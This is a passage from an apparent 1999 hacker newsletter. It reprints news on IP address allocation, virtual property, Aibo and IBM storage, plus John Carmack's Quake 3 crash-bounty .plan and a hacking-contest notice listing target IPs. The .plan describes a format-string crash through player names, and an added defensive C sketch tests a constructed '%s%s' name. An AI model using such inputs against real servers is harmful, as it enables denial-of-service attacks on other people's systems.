Demand for IP numbers is naturally growing due to the Net's evolution as a meeting place and marketplace. Further
draining the IP pool is the aggressive rollout of "always on" cable Net access and the array of handheld devices
that need dedicated IP numbers.

Currently, most online access providers and companies utilize a small batch of IP addresses by dynamically
assigning the numbers based on demand when people log on to their networks. But with broadband services such as
cable, customers must have their own dedicated number.

"It's going to come to the point where your TV remote is speaking IP to your TV, and they'll each need an IP
address," said Paul Vixie, an architect of the Net's address system. Under such a scenario, a typical household
could have more than 250 IP addresses, he added.

In a way the potential shortage of IP addresses is most analogous to the shortage of phone numbers that came about
with the advent of fax machines and cellular phones, which has spurred the addition of new area codes.

And the perceived scarcity of addresses is just the beginning. As more computers connect to the Net, the databases
that map the numbers are growing larger and becoming unwieldy. The ever-increasing size of the network's so-called
routing tables has some Net programmers worried.

"There's going to be a point when machines can't handle the size," said Kim Hubbard, president of the American
Registry for Internet Numbers, which is responsible for allocating and assigning IP addresses in the Americas.

Although there is hope that a new standard, IP version 6 (IPV6), could help alleviate both problems, the timeline for
a rollout is sketchy--estimates range from the next 5 to 25 years. That's why many in the Net addressing trenches
agree that allocation of these precious resources must meet strict guidelines.

"There is this constant tension about whose interest is being served," said Tony Rutkowski, principal consultant for
the Next Generation Internet and a founder of the Internet Society. "It's a combination of how these IP addresses
are allocated and to whom--and that is the rub."

New nonprofit in the middle
And now ICANN, which is mediating a number of other contentious debates, finds itself in the middle of the
long-standing, international struggle over who should hold the key to the IP address treasure chest.

At a public meeting in Berlin later this month, ICANN is expected to take its most definitive step on the issue,
creating an organization to tackle IP addressing.

Since last November, ICANN has been charged with overseeing the Net's technical administration, under a Memorandum Of
Understanding it signed with the Commerce Department. ICANN also has been recognized by more than 25 nations in its new
role.

So far, ICANN's challenges posed by IP numbering have been overshadowed by other topics, such as authorizing new companies
to register domains ending in ".com" or adding new top-level domains such as ".web" and ".firm." Along with the fact that
domains have been a well-publicized issue, ICANN's leaders also don't see the IP address issue as terribly pressing.

"We haven't needed to do anything in the way of [IP address] policy yet," said Michael Roberts, ICANN's interim chief
executive. "There is potential scarcity. The thing to do is get moving on IPV6, which will deploy in an open and fair way
based on reasonable need."

But a failure to adequately tackle a range of problems surrounding IP addresses ultimately could cripple the Net. In fact,
charting a new IP numbering course may prove to be ICANN's most important contribution.

Chain of command gets longer
In the past, policy and oversight of IP addresses has been left to the Internet Assigned Numbers
Authority, the government-funded group that designed the numbering system under the leadership of the late Jon Postel. Under
ICANN, the Internet Assigned Numbers Authority still distributes address space to three geographically diverse Regional Internet
Registries (RIRs), which typically hand out the addresses to large end users such as Internet service providers and universities.

ICANN will be operating under the same bottom-line principles that have guided the Internet Assigned Numbers Authority for the
past three years. They call for a system that conserves addresses and routes Internet traffic more efficiently.

The Internet Assigned Numbers Authority's functions may still be in place, but the chain of command is set to be dramatically
altered. Whereas the buck used to stop at Postel, now it will stop at the ICANN board, which ultimately will be advised--and
elected--by many representatives in the Net community, including regular online users.

Some veteran Netizens view the shift as necessary, but potentially problematic.

"One of the advantages of [the Internet Assigned Numbers Authority]--and one of its
disadvantages--is that it rested with a single individual, and a single individual could
easily make a decision," said Bill Manning, a staffer with the University of Southern
California's Information Sciences Institute, which housed the Internet Assigned Numbers
Authority and also was headed by Postel. "That nimbleness in being able to respond seems
to be a necessary casualty in making [the] transition" to a privatized Internet.

In keeping with its mission to turn over Net governance to the private sector, ICANN has
proposed a model that establishes an address supporting organization (ASO), containing
stakeholders who will forge new policies concerning IP numbering.

At its Berlin meeting May 26, ICANN will vote on proposed bylaws for supporting organizations,
including the ASO. The bylaws will set up an open membership consisting of IP address registries,
ISPs, and end users. For a new policy to be enacted a majority of each membership category must
approve it.

Election of the new organization comes at a critical juncture in the evolution of the Net's address
system, experts say, and is almost certain to stoke the public scrutiny surrounding ICANN.

"It's important that [the ASO] understand the technical issues involved and are not swayed by the
political expediencies that have been pressed in the past," said David Conrad, founder of the Asia
Pacific Network Information Center (APNIC), one of the three IP address registries.

This sentiment is echoed by ISPs, another faction whose input will be vital to the ASO.

"How this policy recommendation body is formed within ICANN is a concern," said Barbara Dooley,
president of ISP trade group the Commercial Internet Exchange.

Numbers don't add up
Not surprisingly, today's system is a far cry from the way things were done in the early days of the
Net.

Thirty years ago few architects of what was then called the Arpanet expected it to mushroom into a
medium that would change the way people live, work, and do business. IP addresses were viewed as an
endless resource that was free for the taking. Out of that thinking came the practice of doling out
wastefully large blocks of numbers to companies or groups that asked for them.

Ford Motor, Eli Lilly, and Hewlett-Packard are just three of the holders of the largest "legacy"
blocks, known as Class A allocations, which contain more than 16.7 million addresses each. In 1995,
leading cable Net access provider @Home appealed to the Internet Assigned Numbers Authority after its
application for a Class A allocation was turned down. @Home ended up getting numerous smaller Class B
allocations, creating some controversy among local registries.

The legacy space doled out to those that had the foresight to ask for it is the source of jealousy for
many latecomers. They point out that while Mercedes Benz holds nearly 17 million addresses, only 1.04
million have been allocated to the entire nation of China.

"There are a number of different business issues we foresee in the future that will require IP
addressing," said Bill Hurley, manager of new media and relationship marketing for Mercedes Benz.
"We are looking to have an IP address for every car."

ICANN no doubt will be pressured to tip the scales toward those who have IP envy.

"Some people in Africa and South America want their own regional registries. Some of the ISPs want to
have a bigger role in how the allocation is done," acknowledged Commerce Department spokeswoman Becky Burr,
who is overseeing the agreement with ICANN.

"There may be a more complicated mix of players," she added. "But it still will be a fairly straightforward
allocation system."

Despite pessimism about shortages in IP space and the politics of allocation, some legacy holders have
voluntarily surrendered their blocks for the good of the Net community, such as the Defense Department and
BBN, now owned by GTE. Stanford University also is in negotiations to return part of its huge block, according
to school and registry officials.

@HWA

37.1 And is webspace infinite?
~~~~~~~~~~~~~~~~~~~~~~~~~

Infinite Space

From http://www.slashdot.org/



Posted by JonKatz on Thursday May 13, @10:00AM EDT
from the Virtual-Property-(cont.) dept.
Physicists, gamers, Web designers and developers and engineers took up (with a vengeance) the question
of whether or not the Net and the Web was an Infinite Space, forever expansible. Most felt that while
Web Space was infinite, desirable property isn't. Also comments about crackers, cryptography, gaming, virtual property,
the future of the Net and the Web, and concerns about whether real world property laws apply online. All in all, a great
cyber gab-fest, pro and con.

E-mail poured in all weekend about Infinite Space -- whether or not space on the Net and Web is forever expansible.

This was an offshoot of columns and discussions here last week about whether new connective technologies like eBay
combined with the millions of middle-class Americans pouring onto the Web were escalating the concept of virtual
property, already a custom on some gaming sites.

On the subject of Infinite Space, I heard from physicists, academics, engineers, gamers, computer execs, developers
and designers -- some very brainy geeks who offered smart and diverging theories.

While a majority of e-mailers thought virtual property was a big idea whose time had come, there were also skeptics
claiming this idea wasn't really anything new.

In one sense, they're right. Gamers have been trading virtual parts, symbols and characters for awhile. But the impact
of new technology is often felt when new and middle-class users mainstream it, not when pioneers invent it.

Linux isn't new either, but that doesn't mean nobody should write or talk about it. As open source reaches critical mass,
it becomes significant. Same with other technologies from the phone to modems to computers themselves. Hackers
were patching together BBSs from the earliest days of networked computing, but it wasn't until many more people,
from housewives to business owners started pouring online that the Net took off. As more and more people -- most
armed with credit cards and checkbooks -- continue to explore and use the Net and the Web, expect continuous and
unimaginable change. But most of you know that.

Note: Lots of people wrote asking if I was changing my column format to include more of my e-mail responses. Yes, I
am. An interactive column should, when possible, include more voices than one. Not only do I get sick of myself, but I
get especially weary of getting so much smart and thoughtful e-mail nobody but me ever sees, while the often highly
testicular public posts on Threads are visible to everybody. Many visitors, lurkers and readers confuse Threads with
reality. It is one reality, but not the only one.

People have a perfect right to flame, but as my e-mail (and every other Slashdot writer and author demonstrates daily)
smart lurkers constitute the vast, unseen majority of Slashdot readers. They also want to be seen and heard.

So here are just a few of the posts -- pro and con -- responding to my columns about virtual property and my questions
about whether space on the Net is an Infinite Space:


Boredom is More Significant, from: Stephane Lajoie

"Is Net and Web property infinite? That is, is the Net so expansible that it could never be overcrowded and congested?

If you abstract away things like bandwidth and hard-drive storage (which seem to grow fast enough anyway), the
answer to the first question is yes: the net is infinite. But you seem to imply that the second question is the same as the
first, which it isn't.

Crowdedness happens in a specific physical place. We can say that New York City is crowded, while Arkansas is
close to empty. If we extend this concept to the net, you can say that slashdot.org is crowded while kgjrhegh.com is
empty (the DN isn't even registered, anybody could move in there for free; not anybody could move in to
Microsoft.com though).

The same thing happens in physical space: if you abstract away things like the currently limited means of transportation,
you can come to the conclusion that living space for humans in the universe is infinite. But just like people go to
slashdot.org and not to kgjrhegh.com, you won't see people moving to Mars en masse even if affordable transportation
becomes available: there just isn't anything fun to do there. I think it is Linus Torvalds who said that in a few decades,
the primary motivation for people to do "anything" will be fear of boredom.

The limit here isn't free domain names or available land in an online game. It's the attention span of people. People buy
powerful characters in UO to get attention from other players. Once the game becomes dated and people start moving
to Everquest, Asheron's Call or others, these characters will lose all their value because there won't be anybody to
show them off to.

You can't open a 20-screen megaplex in Nowhere, Arkansas. You can't sell web ads at kgjrhegh.com. Hope I could
keep your attention for that long :).

PS: The Cyber-Movers example was kinda weak. I mean, it's a bunch of engineers copying files around and setting up
domain name servers. Hardly the signs of a revolution if you ask me :). Still, very interesting subject matter.

PPS: I like this format of writing series of articles instead of moving on to a new subject for each article.

Stéphane Lajoie / Ludus Design


Nanotechnology and other answers, from Rob Jellinghaus:

"Is Net and Web property infinite? That is, is the Net so expansible that it could never be overcrowded and congested?"

This question is familiar in another domain: nanotechnology. The general form of the question is, "Given sufficient
technological development, are resources potentially inexhaustible? And if so, what happens to the economy?"

In general, it is scarcity that creates value. In a world where there are infinite amounts of everything, there is no reason
for everything not to be free. But when there is only so much of something, then competition arises for that scarce
resource, and suddenly you need a way to determine who needs/wants/deserves it most. Presto: economics.

Ultima Online could probably, in principle, expand their cyberverse to accommodate the influx of people craving land. But
it's not clear that they should. The scarcity of land there is greatly increasing the value of each individual property,
perhaps intensifying the fervor of their citizens, and certainly buying them advertising that they couldn't buy with their
own money (your article being a great example). In other words, by keeping their virtual real estate scarce, they are
more effectively competing for the attention of the world's gamers, by making it clear just how valuable that real estate
is.

In fact, UO (Ultima Online) perfectly exemplifies the two resources that are _not_ infinite, and will never be:

- Human attention, as all domain name squatters know, is finite. There are only so many eyeballs, and only so many hours in a
day that those eyeballs can be looking at your little corner of the cyberverse. UO is competing with Everquest (which is
coming up fast). Catchy domain names ("slashdot.org", for instance) will always be more valuable than clunky ones
("www.mybiglongcompanyname.net").

- Computing and, especially, network resources are getting exponentially cheaper, but as exponentially more people go
online, it remains fairly costly to serve large audiences. UO definitely incurs ongoing costs in hardware, network
maintenance, and operations management, to keep its servers running; if they were to expand their universe infinitely,
their costs would also expand infinitely. Later.

Anyway, thanks for the thought-provoking questions,

Liberating the Lurkers, from Dana Ryder, IMMSystems:

"Congrats on the new format, if that's what it is. You are liberating the Lurkers! Posting comments like you are is the
only way some of us can get our ideas out and hear the good ideas of others. The rule on Slashdot Threads seems to be
that the dumber one is, the quicker you are to claim you're smarter than everybody else, or that you already knew
everything everybody else is saying. I can't fault anybody for being stupid, but boy, are these people proud of it!
Slashdot's columns on Virtual Property were talked about all day at my company - keep 'em coming!"


Of Course Not, from: Randall L Joiner:

"To your question about Infinite Space

There are several answers: Of course not, physical (hardware) resources are limited by definition, and thus, eventually
will run out. Within reason, yes, it's infinite: as tech grows, space keeps getting cheaper, and there will always be room of
some sort.

The question really is, is valuable web property infinite? Many people have already answered that, and from the skim I
did, most seem to think no. I have to disagree to an extent. Since games and sites only seem to hold interest for short
time periods (game attention spans often measure in hours of game play), and people are constantly searching for the
next game, I would guess that the interest of the gamers will constantly be going through these stages:

1. New game hits, is relatively unknown.

2. Some gamers become regulars, game grows to a small number of players.

3. Game catches on in the main stream, many people start playing.

4. The original players start tiring of it, (for various reasons) and sell out.

5. Older players go back to stage 1 with some other new game. I think we'll start seeing stage 5 in about 6 months to a
year with Ultima. I give Diablo as an example... Few still play it, because everyone's jumped to Ultima. The new
up-and-coming is EverQuest. It's part of the game cycle, only now we have the middle-class coming in throwing money
around. I want to know what's going to happen when the mass evac happens for the next great game, and the fools are
stuck with characters they've spent loads of $ on, and are now not worth anything, and no one is around to play the
game with? Even the "rich" couldn't keep up for too long, constantly buying new characters for each new game.

Another problem I don't think you've thought of... What happens if there's a network down time? What happens
if/when a hard-drive crashes and wipes out any record of you having owned the property?

If I were the company running the hardware those games are running on, I'd make damn sure I had a clause stating
they aren't responsible for lost characters/property/etc...

Another problem. What happens when (not _if_) someone hacks a game and suddenly goes nuts with it? How about
Virtual Theft? If I cracked the game, steal your house that you just paid 100,000 for, what recourse do you have? Then
there's the difficulty with calling it property... We have a bung-hole load of property laws in the states, but do any of
them apply to cyberspace? How about in a game where killing and taking property is a legal action? If I kill your
character and take the property you just bought, do you have any legal recourse in RL? No, I really don't consider that
a silly problem either, as I've read some of the things people have gone to court over (and won!) that are much much
more silly. Altogether, I'm just completely amused by the concept, and consider this just one more proof that most
people really don't understand what the world or the net is really about."


Please! Absolutely Nothing New Here, from: thom stuart (painfully):

Much as it pains me every single time I realize it, I'm afraid that I have to report that once again you're picking value
out of vapor and getting all excited about something that, as always, isn't exciting or new at all.

I'm tempted to launch into an extensive diatribe, but i've got work to do today. Suffice it to say that the "virtual property"
that's got you so frantic in the last couple days is nothing more than a sale of service.

It's amazing that you're managing to misunderstand this to the extent where you think there's something new. Every
month i buy a package of 'minutes' for my mobile phone from my wireless company. These are just numbers in a
computer, of course - am I purchasing "virtual property" here? And, if i am, haven't people been doing that for years?

I could subscribe to a paying-members-only web site; I could choose to pay for HBO; I could buy an Ultima Online
account or good domain name from ebay. These are all the same thing - I'm buying the right to use a service. Just
because I'm not getting a physical product in return doesn't make it magic or 'cyber' or anything else you might want to
think.

Okay, the UO accounts and domain names might have certain 'added value' in terms of the time/effort invested in
bringing them to their current status, but that doesn't make it any different. By buying an account or a domain, the
purchaser is simply entitled to access to certain kinds of service in return for their cold hard cash - but hey, who pays in
"physical cash" these days, anyway?

Ooh! ooh! virtual property paid for with "virtual money"! another monumental technological discovery from jon katz!
better write another /.column about this! please.


Crackers, Gaming and Infinite Space (anonymous):

Here's a copy of the comment I just posted... thought you might like it...BTW great set of articles, and I find your style
to finally have settled out into something that doesn't seem megalomaniacal and much more suited to the world you've
stepped into.. I've liked about 75% of your articles, those I didn't like were some of the earlier ones:

It's bad enough that hackers are being berated by main stream media for supposedly "stealing" from large, anonymous
corporations, can we all see what will happen when the middle class has a vested interest in computer security?

What were to happen if a cracker got onto one of the Ultima online servers, helped himself to some UO Cash and then
bought himself whatever he needs? Worse yet: Cracker gets onto the server, figures out some of its data structure, and
decides to get into another player's building and cleans him out?

Crackers/malicious hackers finally have something that has value to steal and they would be stealing from mainstream
america instead of the corps.

This can have several consequences as I see it:

First and foremost: The biggest hacker backlash in history. You think the Kevin Mitnick case was bad... now the law
enforcement officials no longer have to work on the "estimated losses" reported by companies when they get
documents copied off their servers (say source code), they have real world price tags on what the damages were.

Moreover, can we really trust mainstream american media to see the difference between hackers and crackers? It's
bad enough that they can't do it now when the crackers are just defacing websites.

Secondly: With a bit of luck, this will drive all aspects of computer security forward. I can see dedicated players paying
good dollars for crypto systems that would protect their online assets. As well, Internationalization of crypto technology
will be given a big boost as non-North american players will want access to the same quality of crypto as we are
privileged to have.

Thirdly: Government regulation will quickly be pushed onto the scene. Any location generating real US$ seems to
become the target of the US house and senate.

Third, B: TAXATION! As is, it's very difficult to keep the internet taxes at bay.

In the states, the problem seems to stem from the separation of states.. but if people start shelling out cash for virtual
property, the likes of which cannot be seen right now, there will be a renewed effort by the USG to tax online
transactions.

Fourth: Hopefully this will lead to the appearance of "free" servers that will pop up and have much more room to grow,
allowing people to settle in. It'd be even nicer if a "Homesteading" act were to be implemented on UO (specific
example) to move over onto the new systems, giving them some sort of bonuses (very much like the development of the
"Wild West" in early America).

From Craig Wright: Interesting, But Shame On You!

Virtual Property is an interesting issue but really is nothing new. Buying "space" from an ISP for a large website has been
around for years, paying someone else to build the website is commonplace, digitizing a photograph, and how about
DOMAIN NAMES? - these are all forms of virtual property. Middle class americans have been paying cash for
ownership of virtual materials for some time now.

Focusing on some geeks who spend too much on UO characters on ebay and then implying from that fact the economy
is undergoing a fundamental change is really quite silly. Put your technophile cheerleader pom poms down and do a little
research willyah?

Within the online gaming community there are other useful examples of virtual property such as Chron-X, Sanctum and
other budding online games working on a far different paradigm than the "service" model of the "pay-as-you-play"
games such as UO. C-X and Sanctum are wholly or partially based around the collectable card game paradigm
introduced years ago by MAGIC: THE GATHERING.

The interesting thing about the online versions (which have been around for at least three years or so) is that they are
ENTIRELY virtual property.

Unlike UO-type games where you have to buy the software and pay an ongoing service fee to keep playing. In these
other games the only thing that one pays for is the virtual cards (software free, no fees except paying for more cards
should you want them). As one might expect, trading, auctioning, and selling collections has been an integral part in the
development of these games. I believe C-X at one time had over 70k accounts and may have plenty more now that
they have moved to a Sony gaming site (I haven't played for nearly a year).

As a matter of fact Genetic Anomalies, the company behind Chron-X, began as a company devising a method for
protecting virtual property and developed what they call Collectible Bits (back in 1996 I believe) and designed
the game primarily as a way to illustrate what their software product could do in terms of reducing stealing and hacking
problems already the cause of so many problems in various online gaming communities. UO tangent: it is neither the
first, best nor probably even the largest of its genre. The 150k players - that's BS, online games inflate their players by
counting ACCOUNTS rather than active players, many players play for a while and then either reduce their playing
time significantly or stop playing altogether - but their ACCOUNTS are still counted. This is especially problematic with
UO as there are a half dozen or so games all currently in stiff competition for the same audience.

By the way, UO is the only one of its genre in which its participants have attempted to bring a class action suit against
the company because of their dissatisfaction with the game. The whole genre is unlikely to become a dominant faction
within the online gaming community merely because it is so damn expensive to play. There have been dozens of
experiments for specific subscription games or subscription gaming sites of several varieties and none have achieved
more than moderate success.

I read a few of the /. comments on your first piece and ran across thoughtful responses that disagreed with you which
also made interesting points -- yet in your article you quote a few imbecilic flames as representative of those who
disagree and more thoughtful responses of those who agree. This is a rather cheap way to make your argument appear
stronger - shame on you! (Note: I only quote from e-mail, since thoughtful (and non-thoughtful) disagreements are
posted openly on Threads. And I didn't get many disagreements last week. I always reflect an accurate balance of
criticism versus agreement - discussions where everybody agrees are sort of pointless, and, on the Net, impossible. As
for nasty flames, they never bother me a bit - kind of like mosquitoes or peas off a tank. Knowledgeable or thoughtful
criticism, on the other hand, terrifies me).

@HWA


38.0 Aibo, Sony's new robotic dog, at $2500US a pop don't dump your furby just yet...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Sony's robotic dog: cute, but not cuddly
By Stephanie Miles
Staff Writer, CNET News.com
May 11, 1999, 1:05 p.m. PT
URL: http://www.news.com/News/Item/0,4,36375,00.html

Could Sony's new Aibo be a robotic--and canine--version of a Trojan horse, this time used to smuggle
the electronics giant's new technology into homes around the world?

Probably not, analysts say, but Aibo will bring robotics into the home, along with other new Sony technologies.

Announced today, Aibo is an electronic pet capable of acting in response to external stimuli and communicating
with its owner. Intended for entertainment purposes only, the robotic dog recalls the company's previous
entertainment product, the PlayStation. Once introduced as a pure gaming platform, the PlayStation now includes
computing components such as DVD drives and Internet access.

The introduction of the electronic pet is probably not a subversive method of ingratiating Sony technology
into the American home, especially because Aibo is only projected to sell 2,000 units in the United States next
year, according to Sean Kaldor, an analyst with International Data Corporation.

"I don't think this is their vehicle to propagate technologies into the mass user scale," Kaldor said, noting
that Aibo can only perform very limited functions and can't even fetch yet. Plus, he noted, the toy is priced
around $2,000, which will probably discourage mainstream acceptance. "This isn't a stealth way to mass-introduce
a product."

But Aibo may be some Americans' first opportunity to play with Sony's Memory Stick, a portable, re-recordable
storage media 1.5 inches long with the thickness of a piece of gum. Sony is selling an 8MB Memory Stick accessory
that can store commands for Aibo.

Aibo is also one of the first shipping devices that run on Sony's Aperios real-time embedded operating system.
Sony struck a deal with General Instrument last year, licensing the operating system for use in GI's set-top boxes.

"There's a lot of operating systems out there, and this is Sony's proprietary operating system," explained Seamus
McAteer, an analyst with Jupiter Communications, expressing doubts that Sony is making any significant attempt
at marketing or promoting Aperios through Aibo.

"You're not going to have a ton of developers developing a lot of applications to run on this device, so it doesn't
buy you a whole lot," he said. "Whoever's going to buy this really doesn't care which real-time OS it is using.
It's a design win, but not a big deal."

Americans are not likely to shell out $2,000 for a programmable dog that does not yet fetch, but Aibo is likely to
succeed in the Japanese market, which wholeheartedly embraced the Tamagotchi electronic toys, Kaldor said.

"The Japanese perspective on technology is warm and fuzzy," he said. "Robots in Japan are seen as very compelling
things, unlike in the U.S., where they seem cold and harsh."

@HWA

39.0 IBM Breaks more records for higher density storage in hard disk units
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Wednesday May 12 4:02 AM ET

IBM Researchers Claim New Data Storage Record

SAN JOSE, Calif. (Reuters) - International Business Machines Corp. (NYSE:IBM - news) said it plans to announce
Wednesday that its researchers have set a new world record for high density data storage.

The company said it has doubled its old record by packing data so tight that 20.3 billion bits can fit in a
square inch of data storage -- pushing up against what many analysts believe to be the physical limits of such
technology.

At the new level of density, every square inch of disk space could hold 2.5 billion bytes -- equivalent to two
TV-quality movies or the text of some 2,500 average-sized novels. Eight bits equal a byte. A byte can store about
one character of text.

The new disk drives are 3.5 times more dense than IBM's highest capacity product, a disk drive for portable
computers capable of storing nearly 6 billion bits per inch of data.

The new developments have been demonstrated only in IBM's research labs, the company noted.

It could take two to three years before IBM is ready to incorporate the technology into commercial products from
IBM, or in disk drives that IBM's technology manufacturing unit increasingly builds for other computer makers, it
said.

``This laboratory demonstration is very good news for our customers and the data storage industry,'' said Robert
Scranton, director of recording head technology at IBM's Almaden Research Center.

``It shows that disk-drive capacities will continue to increase well into the 21st Century,'' he said.

The greater storage capacity could be used to boost the capabilities of portable electronics that use IBM's tiny
1-inch microdrive data storage disks or laptops using its 2.5-inch drives, the company said.

The extra capacity can be used to store recorded music or data-intensive graphics or video that would be impractical
using current technology.

In addition, large corporations could use such ultra-high-capacity drives to store far more data in storage systems
using the same floor space.

``The stability of the bits was especially encouraging,'' Scranton added, referring to possible fluctuations in
storage media used in such systems when pushed to such extremes.

``To make smaller bits, we improve both the disk materials and the read-write components to ensure that the bits'
magnetic orientations will not change by themselves, yet the user can still quickly and reliably erase and rewrite
bits,'' he said.

IBM, which is headquartered in Armonk, N.Y., invented computer hard disk technology in the 1950s and continues to
be a leader in advancing the storage capacity of computers.

The first technical details of the new storage system will be disclosed next week at the International Magnetics
Conference (Intermag 99) in Kyongju, Korea.

@HWA

40.0 Carmack offers a bounty on Quake server DoS's and bug reports
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

F I N G E R



This finger is being tracked and served by The Stomping Grounds' Finger Tracker. If you are looking for more fingers, please visit Stomped or go
directly to the Stomped Finger Tracker.

[idsoftware.com]

Name: John Carmack
Email: johnc@idsoftware.com
Description: Programmer
Project: Quake 3 Arena
-------------------------------------------------------------------------------

5/11/99
-------
You can bias the level of detail lower than allowed in the
menu with "r_lodbias 2", which will force all models to the lowest
lod. The view weapon will look very ugly.

Another little speedup option that isn't offered in the menus is:
"cg_simpleitems 1" this removes the extra rings and spheres around
some items.

You can also turn off all the gibs with "cg_gibs 0".


* clear game memory at init, which fixes the stuck-at-intermission
problem on mac servers
* fixed mismatched free / Z_Free in demo menu
* removed unused reference to sprites/plama.md3
* automatically get sounds from model name
* scale sensitivity by zoom
* immediately archive changes to latched cvars
* cheat protect r_portalonly
* don't print "XXX connected" on level restarts
* fixed "give item" on levels where 0,0,0 is in solid
* fixed timedemo
* don't play pain falling sound if dead
* fixed falling damage sound not snd specific
* fixed crashtest 2
* fixed crashtest 1
* q3map_backshader
* q3map_globaltexture


5/11/99
-------
Do NOT send bug reports and game comments directly to me!
If I have to filter through hundreds of emails a day, I won't get any
more work done... Only crashtest related problems should come to me,
everything else should go to q3feedback@idsoftware.com.


5/11/99
-------
Sami Tammilehto wins the second prize. Some large connectionless packets
can cause crashes.

This one was a result of me having the maximum token size defined lower
than the maximum string size.


5/11/99
-------
BigImp wins the first prize. It doesn't crash the server, but fmtspec
names will crash all clients that try to log on. Technically that would
be an upkeep required DOS attack, but I'll let this one go.

I even had a "FIXME: make vsprintf safe" comment by the offending line...

I am going to update the server to filter out all % chars that come in
over the net to prevent any other similar things.



5/11/99
-------
Everyone should realize that many popular net links are going to be clogged
up with q3test downloads for a while, so net play may be a bit patchy to
a lot of servers.

-------------

Now that the first win32 test is out, here is The Plan for going forward:

All future releases should be same-day for all architectures.

There may be an exe-only update to the current distributions if there are
significant problems, but it isn't scheduled.

The next major test release will include a new one on one map designed for
tournament play, and new executables with server and game modifications, but
will not require downloading a new pak0.pk3.

The release after that will introduce various teamplay rules on the original
two maps. This version will likely be another full download, because I
know that I still have a couple things to change in the map format. This
will probably be the first test running with the virtual machine.

The final major test release will introduce the single player game with
bots and ranks.

After any bugs are shaken out of that, it will be the "Q3 Demo" instead of
the "Q3 Test", and we should be ready to release the full game to stores.

In an ideal world, people that aren't prepared to deal with in-development
software would wait until then to form an opinion of the product.

---------------

***** I am offering a bounty for server crashing bugs. Q2 had several releases
forced out because of malicious attacks on all the public servers, so I
want to try and flush out what I can during Q3's testing phase.

There is a server running in the debugger here at crashtest.idsoftware.com
(192.246.40.68). Anyone that can repeatably hang or crash this system can
have a $100 prize and some misc bit of Q3A paraphernalia that I can dig up.

Operating system level attacks don't count -- only things that I can actually
fix or protect against in my code.

Denial of service attacks don't count if they require upkeep, but if there is
a fire-and-forget DOS attack, it will still count.

Any actions you can perform with the released client are fair game. Crashing
the client isn't good for a bounty, but I would still like to know about it.

Custom attack programs are also fair game. These are actually what I am most
concerned about -- malicious programs that go through and crash all listed
servers.

Ideally, you would practice on a private server under your control and only
hit crashtest when you think you can repeat it.

If you find one, email me the instructions so I can reproduce it. Include
"CRASHTEST" in the subject so I won't miss it.

First come, first served, one bounty per bug. I will update crashtest with
our internal builds, so it will certainly be possible that an attack on the
released servers no longer functions on crashtest.
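A defensive sketch of the two fixes the .plan entries above describe (stripping '%' out of names that arrive over the net, never using player data as a format string, and bounding token length when the string limit is larger than the token limit). This is an added example, not id Software's code; the limits and function names are hypothetical and the inputs are constructed.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical limits in the spirit of Quake's MAX_STRING_CHARS and
 * MAX_TOKEN_CHARS; the real values are not given in the .plan. The
 * "large connectionless packet" bug above came from the token limit
 * being smaller than the string limit without the parser enforcing it. */
#define MAX_STRING_CHARS 1024
#define MAX_TOKEN_CHARS  256
#define MAX_NAME_CHARS   32

/* Copy src into dst (always NUL-terminated), dropping every '%' so the
 * result cannot be misread as a printf format even by a code path that
 * still passes it as the format argument. Returns how many were dropped. */
size_t strip_format_specs(char *dst, size_t dstlen, const char *src)
{
    size_t dropped = 0, n = 0;
    if (dstlen == 0) return 0;
    for (; *src; src++) {
        if (*src == '%') { dropped++; continue; }
        if (n + 1 >= dstlen) break;          /* keep room for the NUL */
        dst[n++] = *src;
    }
    dst[n] = '\0';
    return dropped;
}

/* The real fix behind "FIXME: make vsprintf safe": player data is always
 * an argument to a fixed format, never the format itself. Returns
 * snprintf's length so a caller can notice truncation. */
int format_connect_message(char *out, size_t outlen, const char *name)
{
    return snprintf(out, outlen, "%s entered the game", name);
}

/* Pull one whitespace-delimited token from *text into token (which must
 * hold MAX_TOKEN_CHARS bytes) and advance *text past it. Over-long tokens
 * are truncated and the remainder consumed, so a packet close to
 * MAX_STRING_CHARS can never overrun the smaller token buffer. */
size_t parse_token(const char **text, char *token)
{
    const char *p = *text;
    size_t len = 0;
    while (*p == ' ' || *p == '\t' || *p == '\n') p++;
    while (*p && *p != ' ' && *p != '\t' && *p != '\n') {
        if (len + 1 < MAX_TOKEN_CHARS)
            token[len++] = *p;
        p++;                                 /* consume even when not stored */
    }
    token[len] = '\0';
    *text = p;
    return len;
}

int main(void)
{
    /* Constructed input: a name made of conversion specs, and a 600-byte
     * token inside a string that still fits MAX_STRING_CHARS. */
    char name[MAX_NAME_CHARS], msg[64], tok[MAX_TOKEN_CHARS];
    char packet[MAX_STRING_CHARS];
    const char *cursor = packet;
    size_t dropped;

    dropped = strip_format_specs(name, sizeof name, "%s%s player");
    printf("dropped %zu '%%' chars -> \"%s\"\n", dropped, name);
    format_connect_message(msg, sizeof msg, "%s%s player");
    printf("message built safely: %s\n", msg);

    memset(packet, 'A', 600);
    memcpy(packet + 600, " b", 3);
    printf("first token stored %zu chars\n", parse_token(&cursor, tok));
    printf("next token: %s\n", parse_token(&cursor, tok) ? tok : "(none)");
    return 0;
}
```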






@HWA

41.0 Hack into a webserver and win $10,000 ...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Break Into a Web Server win $10,000


contributed by szone
You can win a measly $10,000 for penetration into web servers during tomorrow's Hackers Zone competition
organized in conjunction with Infosecurity Asia. This 'competition' of course is nothing more than an
exploitation by the sponsors Conclave and Voltaire whose products will be 'tested'. The IP addresses of the
boxes in question are 210.24.153.90 and 210.24.153.70. You need not be present to win. (I don't know about
you but I have better things to do with my time than be advertising fodder for these companies. If they want
a real world security assessment of their products let them pay for one.)

Internet Wire
http://www.internetwire.com/technews/tn/tn982682.htx

Tech Web
http://www.techweb.com/printableArticle?doc_id=TWB19990512S0029

Internet News
http://www.internetnews.com/intl-news/article/0,1087,6_116851,00.html

Nando Times
http://www.internetnews.com/intl-news/article/0,1087,6_116851,00.html


Asian Conference Hosts Hacking Contest
By Malcolm Maclachlan, TechWeb
May 12, 1999 (4:28 PM)
URL: http://www.techweb.com/wire/story/TWB19990512S0029

A conference in Singapore is working to show the dangers of hacking, ironically, by holding a hacking contest with thousands of dollars in prizes. The international
